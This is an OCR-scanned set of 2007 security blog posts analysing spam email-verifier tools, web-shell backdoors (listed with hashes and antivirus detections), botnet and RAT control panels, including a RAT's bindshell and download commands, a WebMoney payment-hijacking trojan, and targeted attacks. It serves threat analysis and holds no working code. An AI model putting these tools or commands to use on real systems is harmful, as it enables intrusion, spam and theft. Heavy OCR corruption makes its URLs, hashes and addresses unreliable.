nir-z@usa.net 
Lift: Andrew-Ross@usa.net 
y£| cenkersisman@usa.net 
woodyg@usa.net 
SI sales@chatspace.com 
SI garzman@inter .net.il 
SI webmaster@getinthering.com 
S3 king@dlgi-net.com 
S3 dirc@dragonmount.net 
S3 winip@dragonmount.net 




Exist 

Exist 

Exist 

Exist 

Exist 

Exist 

Mot exist (SMTP) 
Exist 
Exist 
Exist 

Not exist (S 
Not exist 
Not exist 
Not exist (: 

Not exist (S 
Not exist (: 

Exist 


mail.coffeecup.com "250 <sales@coffeecup.com>.., Recipient ok" 
mail.coffeecup.com "250 <reseller@coffeecup.corns... Recipient ok" 
mait.coffeecup.com "250 <help@coffeecup.corns... Recipient ok" 
mail.befound.com "250 Requested mail action okay, completed" 
mxpoolOl .netaddress.usa.net "250 Recipient OK (714gDLsEjl 115... 
mail.twyst.org “250 2.1.5 <smud@twyst.orgs... Recipient ok" 
mxpool01.netaddress.usa.net "550 <kindaichi@usa.nets... User ... 




:(f 


Exist 

Exist 

Exist 

Exist 

Exist 


7717 






Found 1 relay(s) ImxpoolOI netaddiess.usa.net [10]) 

Check via mxpool01.netaddiess.usa.net SMTP-servei 
Connecting to SMTP server... 

Connected with SMTP-servet 

220 cmsmail07.cms.usa.net ESMTP USA.NET-SMTA vCM.1201.1.04; F 
HELO si72-13.mn ru 

250 cmsmail07.cms.usa.net Hello sl72-13.mn.ru [65.32.153.11], pleasec 
MAI L FR 0 M: < verify@testmail. com> 

250 Sender OK 

RCPT TO;<kindaichi@usa nets 

550 <kindaichi@u$a.net>... User not known 

RSET 

250 Reset state 
QUIT 

mxpoolOl netaddress.usa.net "550 <kindaichi@usa.net>... User not krro 


bellat.pair.com “250 ok" 


Check running, please wait.... 


j Total: 9977 


InChk: 12 


Chkd: 759 


11 The program works on the same algorithm as ISP mail 
systems do. Mail servers addresses for specified ad¬ 
dress are extracted from DNS. The program tries to connect 
with found SMTP-servers and simulates the sending 

of message. It does not come to the message sending — AMV 
disconnect as soon as mail server informs does this 

address exist or not. " 

The old dillema is still place - direct online marketing VS 
spam or what's the difference these days if any? 





















Marketed as tools to assist online marketers these programs 
are [ 10]logically abused by [ll]spammers, phishers and 

everyone in between. 

1. http://ddanchev.blo as pot.com/2007/03/shots-from- 
malicious-wild-west-sample.html 

2. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malicious-wild-west-sample_10.html 

3. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malicious-wild-west-sample 3723.html 

4. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

5. http://www.mailutilities.com/hsv/ 

6. http://ddanchev.blo as pot.com/20Q7/01/inside-email- 
harvesters-confi a uration.html 

7. http://ddanchev.blo as pot.com/2007/Q2/phishin a- 
ecosvstern.html 

8. http://ddanchev.blo as pot.com/2007/01/social-en a ineerin a 
and-malware.html 


9. http://www.mailutilities.com/amv/ 

10. http://ddanchev.blo as pot.com/2007/Q2/ima a e-blockin a- 
in-email-clients-and-web.html 
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11. http://ddanchev.blo as pot.com/2006/Q9/email-spam- 
harvestin a -statistics.html 
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Mujahideen Secrets Encryption Tool (2007-04-12 
14:58) 

Remember [l]Mujahideen Secrets, the [2]jihadist themed 
encryption tool released by the Global Islamic Media 

Front (GIMF) to aid cyber jihadists about to convert to cyber 
terrorists in encrypting their communications? See 

the attached screenshot - if only could jihadists see through 
the eyes of the multilingual crawler or knew I violate 

their OPSEC on a daily basis. The interesting part from a 
PSYOPS perspective is how they've realized that using PGP 










































no longer means improved and sustained self-esteem for the 
average jihadists, so coming up with their very own 


encryption tool and file shredder is a logical step. Encryption, 
even [3]steganography has been used by terrorists for years, 
and despite that no one is feeling comfortable with the idea, 
it's an unspoken fact. There's also something else to keep in 
mind, terrorists are putting more efforts into recruiting 
knowledgeable individuals than trying to educate 

them from day one. And while coding the mujahideen secrets 
software requires nothing more than a simple GUI and 

publicly obtained encryption libraries, I wonder did the 
people behind it on purposely knew who they're compiling 

the tool for, or was it a part time project on a "need to know 
basis"? 


Encryption algorithms' sophistication in respect to the key's 
size shouldn't really be of any concern in this 

case, 
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but how come? Simple, the lack of quality passphrases, even 
implementation of the algorithms into the software, 
combined with client side attacks seeking to obtain the 
passphrase compared to perhaps futile bruteforcing, speak 

for themselves. One thing remains for sure - they're 
encrypting and generating more noise than originally 
thought. 

Go through an [4]analysis of the Technical Mujahid Issue One 
as well. 



1. http://www.zone-h.or g /content/view/14486/30/ 


2. http://ddanchev.blo as pot.com/2007/02/terrorism-and- 
encr v otion.html 

3. http://ddanchev.blo as pot.com/2006/08/ste a ano araohv- 
and-cvber-terrorism.html 

4. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 
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A Compilation of Web Backdoors (2007-04-20 00:58) 

The other day I came across to a nice [l]compilation of web 
backdoors only, and decided to verify how well are 

various AVs performing when detecting them : 

11 I have collected some [2]WEB backdoors in the past to 
exploit vulnerable file upload facilities and others. I 

think a library like this may be useful in a variety of 
situations. Understanding how these backdoors work can 
help 

security administrators implement firewalling and security 
policies to mitigate obvious attacks. 11 

Here are some results listing the AVs that detected them - as 
they should : 

name: cfexec.cfm 

size: 1328 


















md5.: cce2f90563cb33ce32b6439e57839492 
shal: 01c50c39e41c6e95262all41dbfcbf9e8fl4fcl9 
No AV detects this one 
name : cmdasp.asp 
size: 1581 bytes 

md5: d0ef359225f9416dcf29bb274ab76c4b 
shal: 9df3e72df372c41fe0a4d4fle940f98829b752el 
Authentium 4.93.8 04.14.2007 ASP/Ace.G@bd 
Avast 4.7.981.0 04.16.2007 VBS:Malware 
BitDefender 7.2 04.16.2007 Backdoor.ASP.Ace.C 
ClamAV devel-20070312 04.16.2007 ASP.Ace.C 
DrWeb 4.33 04.16.2007 BackDoor.AspShell 
Ewido 4.0 04.16.2007 Backdoor.Rootkit.lO.a 
F-Prot 4.3.2.48 04.13.2007 ASP/Ace.G@bd 
F-Secure 6.70.13030.0 04.16.2007 ASP/Ace.G@bd 
Kaspersky 4.0.2.24 04.16.2007 Backdoor.ASP.Ace.q 
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Microsoft 1.2405 04.16.2007 Backdoor:VBS/Ace.C 

Symantec 10 04.16.2007 Backdoor.Trojan 

VBA32 3.11.3 04.14.2007 Backdoor.ASP.Rootkit.lO.a #1 



Webwasher-Gateway 6.0.1 04.16.2007 

VBScript.Unwanted.gen !FR:M-FW:H-RR:M-RW:M-N:H-CL:H 

(suspicious) 

name: cmdasp.aspx 

size: 1442 

md5.: 27072d0700c9fldb93eb9566738787bd 
shal: 2c43d5f92ad855c25400ee27067fdl5d92dlf6de 
No AV detects this one 
name: simple-backdoor.php 
size: 345 

md5.: fcd01740ca9d0303094378248fdeaea9 
shal: 186c9394e22e91ff68502d7cla71e67c5ded67c c 
No AV detects this one 
name: php-backdoor.php 
size: 2871 

md5.: 9ca0489e5d8a820ef84c4af8938005d5 
shal: 89db6dc499130458597fel5f8592f332fb61607e 
AhnLab-V3 2007.4.19.1/20070419 found [BAT/Zonie] 
AntiVir 7.3.1.53/20070419 found [PHP/Zonie] 
Authentium 4.93.8/20070418 found [PFIP/Zackdoor.A] 
AVG 7.5.0.464/20070419 found [PHP/Zonie.A] 



BitDefender 7.2/20070419 found [Backdoor.Php.Zonie.B] 
F-Prot 4.3.2.48/20070418 found [PHP/Zackdoor.A] 

F-Secure 6.70.13030.0/20070419 found [PHP/Zackdoor.A] 
Ikarus T3.1.1.5/20070419 found [Backdoor.PHP.Zonie] 
Kaspersky 4.0.2.24/20070420 found [Backdoor.PHP.Zonie] 
McAfee 5013/20070419 found [PWS-Zombie] 

Microsoft 1.2405/20070419 found [Backdoor:PHP/Zonie.A] 
NOD32v2 2205/20070419 found [PHP/Zonie] 

Norman 5.80.02/20070419 found [PHP/Zonie.A] 

VBA32 3.11.3/20070419 found [Backdoor.PHP.Zonie #1] 
Webwasher-Gateway 6.0.1/20070419 found [Script.Zonie] 
name: jsp-reverse.jsp 
size: 2542 

md5.: ebf87108c908eddaef6f30f6785d6118 
shal: 24621d45f7164aad34f79298bcae8f7825f25f30 
No AV detects this one 
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name: perlcmd.cgi 
size: 619 

md5.: C7ac0d320464a9dee560e87d2fdbdb0c 



shal: 6cd84b993dcc29dfd845bd688320bl2bfd219922 
No AV detects this one 
name: cmdjsp.jsp 
size: 757 

md5.: 3405a7f7fc9fa8090223a7669a26f25a 
shal: Id4dlccl54f792deal94695f47el7f5f0ca90696 
No AV detects this one 
name: cmd-asp-5.1.asp 
size: 1241 

md5.: eba86b79c73195630fbld8b58dal3d53 
shal: 22d67b7f5f92198d9c083el40ba64ad9d04d4ebc 

Webwasher-Gateway 6.0.1/20070419 found 
[VBScript.Unwanted.gen !FR:M-FW:M-RR:M-RW:M-N:H-CL:H 
(sus¬ 
picious)] 

Rather interesting, there have been [3]recent targeted 
attacks aiming at gullible admins who'd put such web 

shells at their servers, thus opening a reverse shell to the 
attackers. As always, this compilation is just the tip of the 
iceberg, as Jose Nazario points out having variables means a 
different checksum, and considering the countless 

number of ASP, PHP and PERL based reverse backdoors, the 
threat is here to remain as silent and effective as possible. 



Grep this viruslist, especially the [4]ASP, PHP and PERL 
backdoor families to come up with more variants in case you 

want to know what's already spotted in the wild. Here's a 
very well written paper by Gadi Evron on [5]Web Server 

Botnets and Server Farms as Attack Platforms discussing the 
economies of scale of these attacks. 

1. http://michaeldaw.or a/ pro i ects/web-backdoor-compilation/ 

2. http://www.sans.or a /resources/malwarefaq/rwww_shell. php 

3. http://asert.arbornetworks.com/2007/Q2/ ph pweb o uard- 
and-asoweb o uard-attacks/ 

4. htto://vx.netlux.or g /vl. oh o?dir=virlist 

5. 

http://www.bevondsecuritv.com/white pa pers/GadiEvron VBF 
eb07.pdf 
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Shots from the Malicious Wild West - Sample Five 
( 2007 - 04-20 02 : 24 ) 

Open source malware with a MSQL based web command and 
control? It's not just Sdbot and Agobot being the 

most popular malware groups that have such features by 
default, but pretty much every new bot famility. The Cyber 

Bot, a malware on demand is one of these. Among the typical 
DDoS capabilities such as SYN,ACK, ICMP, UDP, DNS 





















and HTTP post and get floods, it offers various rootkit 
capabilities in between the ability to bypass popular AV and 

firewall software. I recently located various screenshots from 
the web command and control which I'm sure you'll find 

enlightening. A picture is worth a thousand fears as usual. 
Rather interesting, the bot is able to figure out whether 

the infected user is on a LAN, dialup, or behind a proxy 
connection, the rest of the statistics such as IP geolocation 
and infected users per OS are turning into a modular 
commodity. It's also worth noting that the web interface has 
the 

capability to offer access to the control panel to more than 
one registered user, which logically means that it's build with 
the idea to provide rental services. 
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Here's a related post with more [l]web command and control 
screenshots, and another one taking into con¬ 
sideration various [2]underground economics. 

1. http://ddanchev.blo as pot.com/2006/ll/nuclear- a rabber- 
toolkit.html 

2. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 
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Shots from the Malicious Wild West - Sample Six 
( 2007 - 04-20 03 : 06 ) 

Continuing the "Malicious Wild West" series, the Blacksun 
RAT integration on the web is so modules-friendly it makes 
you wonder why it's not another case study on malware on 
demand, but a publicly obtainable open source malware 

like it is. Process injections in explorer.exe by default, and 
with a default port 2121, this HTTP bot is still in BETA. And 
BETA actually means more people will play around with the 
code, and add extended functionalities into it. There's a 

common myth that the majority of botnets are still operated 
through IRC based communications, and despite that 

there're still large botnets receiving commands through IRC, 
there's [l]an ongoing shift towards diversification and 

HTTP in all of its tunneling and covert beauty seems to be a 
logical evolution. 
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Here are some commands included in default admin.php that 
speak for themselves : 

OPTION value=cmd 

OPTION value=cmd 

OPTION value=bindshell 

OPTION value=download 

OPTION value=ftp upload 

OPTION value=msgbox 



OPTION value=power 
OPTION value=monitor 
OPTION value=cdrom 
OPTION vaIue=keyboard 
OPTION value=mouse 
OPTION value=crazymouse 
OPTION value=funwindows 
OPTION value=version 
OPTION value=exitprocess 
OPTION value=killmyself 

Killmyself is quite handy in case you get control of the botnet 
in one way or another and desinfect the entire 

population with only one command. Stay tuned for various 
other "releases" in the upcoming virtual shots during the 
next couple of days. 

1. http://ddanchev.blo as Dot.com/2007/Q3/botnet- 
communication-platforms.html 
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Google in the Future (2007-04-20 03:37) 

Great fake as a matter of fact. Don't blame the crawler while 
crawling the public Web, but the retention of clickstreams for 







indefinite periods of time and the intermediaries selling them 
to keyword marketers. And of course the emerging 

centralization of [l]too much power online with its [2]privacy 
implications - power and responsibility must intersect. 

[3]Two more fakes for [4]you to enjoy. 

1 . 

http://www.marketwatch.com/news/storv/eu-privacv-bod v- 
criticizes- a oo a le/storv.aspx? a uid = %7B578CE44F-EDC5- 

43A8-865A-519605 83 F9D3%7D 

2 . 

http://www.wired.com/politics/onlineri a hts/news/2007/04/do 

ubleclick 

3. http://ca a lecartoons.com/ima a es/preview/%7BE04QB3EA- 
39CF-4001-AlA6-896CAFA68798%7D. gif 

4. 

http://photosl.blQ aa er.com/blo aa er/1933/1779/1600/ a oo ale 

lOvearsfromnow.Q jpa 
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OSINT Through Botnets (2007-04-23 18:06) 

[l]Open source intelligence gathering techniques from a 
government sponsored cyber espionage perspective have 

been an active doctrine for years, and that's thankfully to 
niching approaches given the huge botnet infected network 























- government and military ones on an international scale as 
well. And yes, [2]targeted attacks as well. It's a public 

secret that botnet masters are able to [3]geolocate IPs 
through commercially obtainable databases reaching levels 
of 

superior quality. Have you ever thought what would happen 
if access to botnet on demand request is initiated, but 

only to a [4]botnet that includes military and government 
infected PCs only? Here's a related story : 


The misuse of US military networks by spammers and other 
pond life is infrequently reported, but goes back some 

years . In August 2004, we reported how blog comment 
spams promoting illegal porn sites were sent through com¬ 
promised machines associated with unclassified US military 
networks. Spam 

advertising "incest, rape and animal sex" pornography was 
posted on a web log which was set up to discuss the ID 

Cards Bill via an open proxy at the gateway of an unclassified 
military network. 11 

From an OSINT perspective, part by part a bigger picture 
emerges from the tiny pieces of the puzzle, and de¬ 
spite that these would definitely be unclassified, a clerk's 
email today may turn into a major violation of OPSEC 


tomorrow . Moreover, the security through obscurity 
approach of [5]different military networks might get a little 



bit 


shaken up due to the exposure of the infrastructure in a 
passive mode from the attacker's perspective. 

In the wake of yet another [6]targeted attack on U.S 
government networks in the form of zero-day vulnerabil¬ 
ities in Word documents neatly emailed to the associated 
parties, it's worth discussing the commitment shown 
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in the form of the Word zero day, and the attach 
congressional speech to Asian diplomacy sent to Asian 
departments : 

" The mysterious State Department e-mail appeared to be 
legitimate and included a Microsoft Word docu¬ 
ment with material from a congressional speech related to 
Asian diplomacy , Reid said. By opening the document, 

the employee activated hidden software commands 
establishing what Reid described as backdoor 
communications 

with the hackers. The technique exploited a previously 
unknown design flaw in Microsoft's Office software, Reid said 

. State Department officials worked with the Homeland 

Security Department and even the FBI to urge Microsoft to 
develop quickly a protective software patch, but the 


company did not offer the patch until Aug. 8 — roughly eight 
weeks after the break-in. 


The life of this zero day vulnerability started much earlier 
than anyone had predicted, and obviously specific 

emails of various departments are known, are harvested or 
obtained through the already infected with malware PCs 

- pretty much everything fora successful targeted attacks 
seems to be in place right? But what makes me wonder is 

where are the attacking emails originating from, an infected 
ADSL user somewhere around the world whose spoofed 

.gov or .mil email somehow made it not though and got 
undetected as spam, or from an already infected .gov or .mil 

host where the attackers took advantage of its IP reputation? 

In the majority of news articles or comments I come across to, 
reporters often make the rather simplistic 

connection with China's emerging cyber warfare capabilities 

- a little bit of [7]Sun Tzu as a school of thought and 

mostly rephrasing U.S studies - whenever an attacking email, 
or [8]attack is originating from China's netblocks. 

Perhaps part two of my previous post "[9]from the 
unpragmatic department" sparkled debate on [lOjphysically 

bombing the sources of the attacks, just to make sure I 
guess. Engineering cyber warfare tensions nowadays, 



providing that China's competing with the U.S for the 
winning place on botnet and spam statistics for the last 
several years speaks for itself - the U.S will find itself 
bombing U.S ISPs and China will find itself bombing Chinese 
ISPs 

. So the question is - why establish an offensive cyber warfare 
doctrine when you can simple install a type of Ly¬ 
cos Spam Fighting screensaver on every military and 
government computer and have it periodically update its 
hitlists? 
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Black humour is crucial if you don't want to lose your real 
sense of humour, and thankfully, for the time being an 
offensive cyber warfare provocation - or the [ll]boring 
idleness of botnet masters - isn't considered as a 

statement on war yet. [12]The Sum of All Fears's an amazing 
representation of engineering tensions in real-life, so 

consider keeping your Cyber Defcon lower. 

Open source visualization courtesy of [13]NYTimes.com, 
[14]MakeLoveNotSpam's effect courtesy of Netcraft. 

UPDATE: Apparently, [15]seven years ago North Korea's 
hyped [16]cyber warfare unit was aware of the concept of 

targeted attacks so that: 


Kim Jong II visited software labs and high-tech hubs during 
his rare trips to China and Russia in 2000 and 2001. When 



then- U.S. Secretary of State Madeleine Albright visited 
Pyongyang in 2000, he asked for her e-mail address. 


On a future visit, in a future tense, perhaps IM accounts 
would be requested to rotate the infection vectors. 

Meanwhile, read a great article on [17]North Korea's IT 
Revolution, or let's say a case study on failed [18]TECHINT 

due to a self-serving denial of the word globalization. 

1. http://ddanchev.blo as pot.com/2006/Q9/benefits-of-open- 
source-intelli a ence.html 

2. http://ddanchev.blo as pot.com/2006/09/chinese-hackers- 
attackin a -us.html 

3. http://ddanchev.blo as pot.com/2007/Q2/rootlauncher- 
kit.html 


4. http://www.there a ister.co.uk/2007/04/16/militarv botnet/ 

5. http://ddanchev.blo as pot.com/2006/09/bi aa est-militar v- 
hacks-of-all-time.html 

6 . 

http://news.vahoo.eom/s/ap/20070419/ap on hi te/hackers 
state department 

7. http://www.ndu.edu/inss/siws/chl.html 

8. http://www.fcw.com/article97658-02-13-Q7- 
Web&printLavout 

9. http://ddanchev.blo as pot.com/20Q7/01/preventin a- 
massive-al-qaeda-cvber.html 






































10. http://www.networkworld.com/news/2007/0208Q7-rsa- 
c vber-attacks.html 


11. http://ddanchev.blo as pot.com/2007/Q2/korean-zombies- 
behind-root-servers.html 


12. http://en.wikipedia.or a /wiki/The_Sum_of_AII_Fears 

13. 

http://www.nvtimes.com/2006/12/03/ma a azine/03intelli a enc 
e. html ?ex = 132 2802000&en=4602 7e63d79046ce&ei = 5090 

14. 

http://news.netcraft.com/archives/2004/12/01/soam sites cri 
o oled b v I vcos screensaver ddos.html 

15. http://www.usatodav.com/tech/news/20Q3-12-25-nkorea- 
comouters x.htm 

16. http://ddanchev.blo as pot.com/2006/Q7/north-koreas- 
c vber-warfa re-unit-121. html 

17. http://www.atimes.com/atimes/Korea/ID24D a 01.html 

18. http://en.wikipedia.or a /wiki/TECHINT 
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Shots from the Malicious Wild West - Sample Seven 
(2007-04-25 13:34) 

[l]The Webmoner is a malware family that's been targeting 
the [2]WebMoney service for the [3]last couple of years, 































a service which is mostly used in Russia from both legitimate 
and malicious parties - three out of five transfers by 

malicious parties use WebMoney and the other two use 
Yandex. What's interesting about this trojan, or we can 

perhaps even define it as a module given its 2kb packed size 
and compatibility with popular malware C &C platforms in 
respect to stats, is that it doesn't log the accounting details 
of Web Money customers, instead, the attacker is 

feeding the trojan with up to four of his Web Purses, so that 
at a later stage when the infected party is initiating 

transfer, the malware will hijack the process and intercept 
the payments and direct them to the attacker's web 

money accounts . See how various AVs are performing when 
detecting a sample of it. 

The disturbing part is a recently made public builder, the 
type of DIY a.k.a the revenge of the script kiddies 

with 
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a push of a button malware generation with a built in fsg 
packing to further obfuscate it and have it reach the 1.5kb 
size. See attached screenshot. This attack puts the service in 
a awkward situation, as the transfers are 

actually hijacked on the fly, and the responsibility is 
forwarded to the infected party, compared to a situation 

where the details have been keylogged and transfers made 
with stolen IDs. How have things evolved from 2001 



until 2007? Keylogging may seem logical but is the worst 
enemy of efficiency compared to techniques that 

automatically, collect, hijack and intercept the desired 
accounting data. [4]The screen capturing banking trojan 

Hispasec came across to is a good example presenting the 
trade off here. The irony? The author of the builder is an¬ 
ticipating malware on demand requests and charging 10 
WMZ in virtual money for undetected pieces of the malware . 

There's an ongoing debate on the usefulness and lack of 
such of popular anti virus software. In January 2007, 

the Yankee Group released a 4 pages report starting at $599 
- try a [5]26 pages free alternative released in January 

2006 debunking lots of myths - entitled "[6]Anti-Virus is 
Dead: Long Live Anti-Malware" in an effort to not only 
generate lazy revenues on their insights, but to emphasize 
on the false feeling of security many AVs provide you 

with. As a consultant you often get the plain simple question 
on which is the best anti virus out there, to which 

you either reply based on lead generation relationship with 
vendors, or do them a favour and answer the question 

with a question - the best anti virus in respect to what? 
Detecting rootkits? Removing detected malware and 

restoring the infected files to their previous condition? Log 
event management compatibility with existing security 

events management software? Fastest response times to 
major outbreaks? - psst zero day malware ruins the effect 



here. Or which anti virus solution has the largest dataset for 
detecting known malware? Anti virus is just a part 

of your overal security strategy, and given the anti virus 
market is perhaps the one with the highest liquidity, thus 

most $ still go to perimeter defense solutions, too much 
expectations and lack of understanding of the threatscape 

mean customer dissatisfaction which shouldn't always be the 
case. If anti virus software the way we use it today is 

dead, then John Doe from the U.S or Ivan Ivanov from Russia 
woud still be 31337-ing the world, the Sub7 world I mean. 

Some AVs however perform better than others on given 
tasks. The recently released [7]AV comparatives speak for 

themselves. If you're going to use an anti virus software, use 
one from a company who's core competency relies 

in anti virus software, and not from a company that entered 
the space through acquisition during the last couple 

of years, or from one where anti virus is just part of huge 
solutions portfolio. Boutique anti virus vendors logically 
outperform the market leaders - exactly the type of advice 
I've been giving out for quite a while. 

Related posts : 

[8] Security Threats to Consider when Doing E-banking 

[9] No Anti-Virus, No E-banking for You 

[10] The Underground Economy's Supply of Goods 


Previous "virtual shots" : 



[ 11 ]Shots from the Malicious Wild West - Sample Six 

[12] Shots from the Malicious Wild West - Sample Five 

[13] Shots from the Malicious Wild West - Sample Four 

[14] Shots from the Malicious Wild West - Sample Three 

[15] Shots from the Malicious Wild West - Sample Two 

[16] Shots from the Malicious Wild West - Sample One 

1. http://www.f-secure.com/v-descs/wmoatch.shtml 

2. http://www.webmonev.ru/ 

3. http://www.kasperskv.com/news7id = 243 

4. http://ddanchev.blo as pot.com/2006/%20Q9/bankin a- 
tro i an-defeatin a -virtual.html 

5. http://www.linuxsecuritv.com/docs/malware-trends.pdf 

6. http://www.marketresearch.com/product/displa v.asp? 
productid = 1424773&xs=r 

215 

7. http://www.av-comparatives.or g/ 

8. http://ddanchev.blo as pot.com/20Q6/01/securitv-threats-to- 
consider-when.html 

9. http://ddanchev.blo as pot.com/2006/Q5/no-anti-virus- 
software-no-e-bankin a .html 

10. http://ddanchev.blo as pot.com/2007/03/under a round- 
economvs-su ppl v-of- a oods.html 




































11. http://ddanchev.blo as pot.com/2007/04/shots-from- 
malicious-wild-west-samole_7672.html 


12. http://ddanchev.blo as pot.com/2007/Q4/shots-from- 
malicious-wild-west-sample_20.html 

13. http://ddanchev.blo as pot.com/2007/Q4/shots-from- 
malicious-wild-west-sample.html 

14. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malicious-wild-west-samole 3723.html 

15. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malidous-wild-west-samole 10.html 

16. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malidous-wild-west-samole.html 
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Outsourcing The Spying on Your Wife (2007-04-26 
02 : 12 ) 

[ 1 ] 

Targeted attacks and zero day malware have always been 
rubbing shoulders, and it's not just a fad despite that 

everyone's remembering the wide-scale malware outbreaks 
attacking everything and everyone from the last couple of 

years. But the days of segmenting targeted attacks per 
country, city, WiFi/Bluetooth spot coverage are only 
emerging. 


























The idea of profitably serving a demand for a service 
however, is promting detective agencies to adapt to to¬ 


day's standards for surveillance and snooping in the form of 
using malware to obtain the necessary information. 

And despite that commercially [2]obtainable surveillance 
tools are [3]cheaply available to everyone interested and 

taking the risk of using them, customers obviously prefer to 
leave it to the "pros". Here's a story of an "adaptive" 

[4]detective agency using targeted emails with malware to 
spy : 

" The jury of five woman and seven men heard how the 
agency used "Trojan" computer viruses, which were 

hidden inside emails and attacked computers when opened, 
allegedly created by American-based IT specialist Marc 

Caron. Hi-tech devices used to bug phones were installed by 
interception specialist Michael Hall, the court was told. 

Prosecutors said a number of them were fitted to BT's 
telegraph polls and inside junction boxes, but BT eventually 

hid a camera in one of the boxes and caught him at work. 


Here're more [5 jdetaiIs on the targeted attack : 

" Mrs Mellon opened it because it "purported to show what 
her husband was up to", said Ms Moore. It is alleged the 
agency hacked into emails to snoop on Tamara Mellon. The 
Trojan then recorded "every keystroke that 



was made", she said, including such things as bank account 
numbers and passwords . "They didn't take any money. 

They didn't steal anything, but from time to time they had a 
little snoop on behalf of their clients," Ms Moore said. " 

I imagine a questionnaire from such a detective agency in 
the form of the following : 

- The victim's IT literacy from 0 to 5? 

- Are they aware of the concept of anti virus and a firewall? 

- List us all their contact points in the form of IM and email 
accounts 

- Are they mobile workers taking advantage of near-office 
WiFi spots? 

You get the point. Hopefully, such services wouldn't turn into 
a commodity, or even if they do, I'm sure they'll 

somehow figure out a way to legally forward the 
responsibility to the party that initiated the request. 

Related posts: 

[6] HP Spying on Board of Directors' Phone Records 

[7] HP's Surveillance Methods 

[8] Mark Hurd on HP's Surveillance and Disinformation 

[9] 

1 . 

http://photosl.blo aa er.com/blo aa er/1933/1779/160Q/covert 
o peratives pg 






2. http://ddanchev.blo as pot.com/2007/Q3/usb-surveillance- 
sticks.html 


3. http://ddanchev.blo as pot.com/2007/Q3/ a hosts-in- 
ke vboard.html 

4. http://news.bbc.co.Uk/2/hi/uk news/6592717.stm 

5. http://news.bbc.co.Uk/2/hi/uk news/6591981 .stm 

6. http://ddanchev.blo as pot.com/2006/Q9/hp-s pvina -on- 
board-of-directors-phone.html 
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7. http://ddanchev.blo as pot.com/2006/Q9/hps-surveillance- 
methods.html 


8. http://ddanchev.blo as pot.com/2006/10/mark-hurd-on-hps- 
surveillance-and.html 


9. http://news.bbc.co.Uk/2/hi/uk news/6591981 .stm 
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Malware Infected Removable Media (2007-04-26 
02:38) 

In a previous post I discussed various thought to be outdated 
physical security threats such as [l]leaving behind CDs 

and DVDs malware ready and taking advantage of the auto 
loading feature most people conveniently have turned on 

by default. Seems like on purposely leaving behind pre¬ 
infected removable media with the hope that someone will 
























pick them up and act as a trojan horse themselves, still 
remains rather common . Unless your organization has taken 

the necessary removable media precautions, a story on 
[2]USB sticks with malware should raise your awareness on 

an attacker's dedication to succeed : 


Malware purveyors deliberately left USB sticks loaded with a 
Trojan in a London car park in a bid to trick users into 

getting infected. The attack was designed to propagate 
Trojan banking software that swiped users' login credentials 

from compromised machines. Check Point regional director 
Nick Lowe mentioned the ruse during a presentation 

at the Infosec trade show on Tuesday, but declined to go into 
further details, citing the need for confidentiality to 

protect an investigation he's involved in. 11 

From an attacker's perspective that's an investment given 
USB sticks are left in parking lots around major 

banks, and finding a 1GB USB stick laying around would 
make someone's day for sure. Despite that in this case it's a 

banking trojan we're talking about, on a more advanced 
level, corporate espionage could be the main aim though 

the Sexploitation of various techniques. 

1. http://ddanchev.blo as pot.com/20Q6/Q3/old- ph vsical- 
securitv-threats-still.html 







2 . 

http://www.chan nelre a ister.co.uk/2007/04/25/usb malware/ 
3. http://www.usbhacks.com/cate aor v/tools/ 
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Conventional Weaponry VS Cyber Terrorism (2007-04- 
26 02:54) 

[l]lnsightful comment on how assymetric warfare and 
abusing the most versatile communication medium is 

something conventional weaponry cannot and should not 
aim to fight: 

11 Terrorists use a flat, open network of communications and 
pass their information mainly through the Inter¬ 
net, Lute said as he briefed the group at the Pentagon. These 
are aspects that defy U.S. military capability. "We 

buy airplanes, ships and tanks and recruit and train soldiers 
to deal with the geographies of a tangible target," he 

said. "We can bomb training camps, and we can hunt down 
the enemy, but we can't bomb the Internet." By using a 

nodal network to spread their extremist ideologies, Lute said, 
terrorists are able to easily recruit members, acquire 

weapons, build leaders and receive financial backing. 11 

A short excerpt from a [2]previous post: 






" A terrorists' training camp is considered a military target 
since it provides them the playground to develop 

their abilities. Sooner or later, it will feel the heat and 
dissapear from the face of the Earth, they know it, but don't 
care mainly because they've already produced and are 
distributing [3]Spetsnaz type of video training sessions . 

So abusing information or [4]the information medium itself is 
much more powerful from their perspective then 

destroying their means for communication, spread 
propaganda, and obviously recruit. " 

Reminds me of a great cartoon where soldiers are in the 
middle of a network centric warfare situation, all 

the[5] 

equiptment on the field is in smoke or doesn't work, and 
soldiers beg the generals for more M [6]shock and 
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awe" action and less ELINT attacks. Which, of course, doesn't 
mean known adversary locations shouldn't get erased from 
the face of the Earth. Post strike imagery courtesy of FAS, 
here's [7]the rest of the collection. 

1. http://www.emilitarv.or a /article. ph p7aid = 10677 

2. http://ddanchev.blo as pot.com/2007/Q2/forensic- 
examination-of-terrorists-hard.html 

3. http://www.spetsnaz- a ru.com/ 

4. 

http://photosl.blQ aa er.com/blo aa er/1933/1779/1600/Cvbert 















errorism. ipg 


5. 

http://phQtQsl.blQ aa er.com/blo aa er2/4099/2257/200/holv w 

ar-j^g 

6. http://en.wikipedia.Qr a /wiki/Shock and awe 

7. http://www.fas.or a/ir p/imint/af a han.htm 
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Malicious Keywords Advertising (2007-04-30 03:20) 

Blackhat SEO's been actively abused by spammers, phishers 
and malware authors, each of them contributing to the 

efficiency of the underground ecosystem. [l]Comments 
spam, [2]splogs, coming up [3]with ways to [4]get a backlink 

from a .EDU domain, the arsenal of tools to abuse traffic 
acquisition techniques has a new addition - [5]paid keyword 

advertising directly [6]leading to sites hosting [7]exploit 
code : 

" Those keywords put the criminals' sponsored links at the 
top of the page when searches were run for brand 

name sites like the Better Business Bureau or Cars.com, 
using phrases such as "betterbusinessbureau" or "modern 
cars airbags required." But when users clicked on the ad link, 
they were momentarily diverted to smarttrack.org, a 
malicious site that used an exploit against the Microsoft Data 
Access Components (MDAC) function in Windows to 












plant a back door and a "post-logger" on the PC. " 

Here's another interesting subdomain that was using JPG 
images to " break the .exe extension ice " and redi¬ 
rect to anything malicious - 
